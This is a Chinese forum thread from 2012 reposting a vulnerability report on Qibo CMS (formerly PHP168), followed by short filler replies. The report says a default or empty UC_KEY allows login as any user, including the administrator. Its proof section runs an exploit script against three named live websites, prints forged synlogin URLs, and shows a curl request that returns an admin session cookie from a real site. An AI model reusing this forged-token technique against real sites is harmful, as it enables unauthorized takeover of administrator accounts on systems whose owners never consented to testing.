查看: 9642|回复: 28

齐博cms网站系统 配置不当导致任意用户登陆漏洞

[复制链接]
发表于 2012-10-6 07:04:33 | 显示全部楼层 |阅读模式
漏洞类型: 未授权访问/权限绕过

简要描述:

齐博cms整站系统(原PHP168)配置不当导致任意用户登陆,比如cms管理员等。
详细说明:

还是由于UC_CENTER的问题,之前闹过UC_KEY变量为空时可以调用UC_CENTER中的相关用户API直接进行操作,今天下了一份V7版本的源码,在uc_config.php中发现UC_KEY被初始化了

define('UC_DBCONNECT', '0');
define('UC_KEY', 'fdsafd43'); //这里做了初始化
define('UC_API', 'http://v7.com/dz/uc_server');


Google了一把,发现很多站都可以用空的UC_KEY或默认的UC_KEY成功调用UC接口。
漏洞证明:

从官方成功案例中找到一个网站

$ php uc.php haidian.10000tc.com synlogin
[+] UC_KEY 'null' can use .

  • EXP = do/api/uc.php?code=fca08oORxQ3xNG01MA1KO9cEPCcedNTThklj6RW2mzYoO9ReaVA4D6XZPJ06GSY0xrpCwNQD6YfusbP1nPJG0HsSB95BkMT6FcarqAVEamHr
    $ php uc.php 0755456.com synlogin
    [+] UC_KEY 'default' can use .
  • EXP = do/api/uc.php?code=c788q%2Byp%2F4oC5rvSuzpCpuLHRIYu9VIR%2Bzl8pJ60hOX8xYAxKoBajYXvRFG72oAadPVjFlAy8n6565gMUXPZNeKBXSQP0SDBJ9JPvq4XkLf4
    $ php uc.php www.zjxiaoyifeng.com synlogin
    [+] UC_KEY 'default' can use .
  • EXP = do/api/uc.php?code=7755%2FC0y9ZruP9op7MtO5lPx92MRfmUImcEf3ZmVIvDDjl8zpfKI%2FTEU6PwkKbW8QioWTD7nai2FaauVyAVTwICk6mrQwLvS6dsNawJyoPX5


    看看是否set cookie

    $ curl -I "http://haidian.10000tc.com/do/api/uc.php?code=fca08oORxQ3xNG01MA1KO9cEPCcedNTThklj6RW2mzYoO9ReaVA4D6XZPJ06GSY0xrpCwNQD6YfusbP1nPJG0HsSB95BkMT6FcarqAVEamHr"
    HTTP/1.0 200 OK
    Date: Wed, 15 Aug 2012 06:23:32 GMT
    Content-Type: text/html; charset=gb2312
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    X-Powered-By: PHP/5.2.8
    Set-Cookie: USR=lju34nhv%090%091345011812%09http%3A%2F%2Fhaidian.10000tc.com%2Fdo%2Fapi%2Fuc.php%3Fcode%3Dfca08oORxQ3xNG01MA1KO9cEPCcedNTThklj6RW2mzYoO9ReaVA4D6XZPJ06GSY0xrpCwNQD6YfusbP1nPJG0HsSB95BkMT6FcarqAVEamHr; expires=Thu, 16-Aug-2012 06:23:32 GMT; path=/; domain=10000tc.com
    Set-Cookie: choose_cityID=1; expires=Fri, 14-Sep-2012 06:23:32 GMT; path=/; domain=10000tc.com
    Set-Cookie: zone_id=1; expires=Fri, 14-Sep-2012 06:23:32 GMT; path=/; domain=10000tc.com
    P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
    Set-Cookie: passport=1%09admin%09AFVdAg1SUwZVD1QDAFVdBwdXA1VRVAYAUAxXAFdUUlc%3D289d3139c3; expires=Thu, 16-Aug-2012 06:23:32 GMT; path=/; domain=10000tc.com
    X-Cache: MISS from WT263CDN-21172
    X-Cache-Lookup: MISS from WT263CDN-21172:80
    Via: 1.0 WT263CDN-21172 (squid/3.0.STABLE20)
    Connection: close
  • 发表于 2012-10-9 19:05:21 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    发表于 2014-10-14 20:38:36 | 显示全部楼层
    这贴?不回都不行啊  
    发表于 2014-10-26 17:05:00 | 显示全部楼层
    楼主的内容不管你信不信,反正我信了
    发表于 2014-11-6 02:06:03 | 显示全部楼层
    ding   支持  
    发表于 2014-11-18 16:29:55 | 显示全部楼层
    哈哈 我支持你
    发表于 2014-12-6 10:41:02 | 显示全部楼层
    我十目一行也还是看不懂啊  
    发表于 2014-12-29 16:17:34 | 显示全部楼层
    好人一个  
    发表于 2015-1-29 11:53:55 | 显示全部楼层
    我好想升级  
    发表于 2015-3-3 16:02:59 | 显示全部楼层
    先顶后看  
    高级模式
    B Color Image Link Quote Code Smilies

    本版积分规则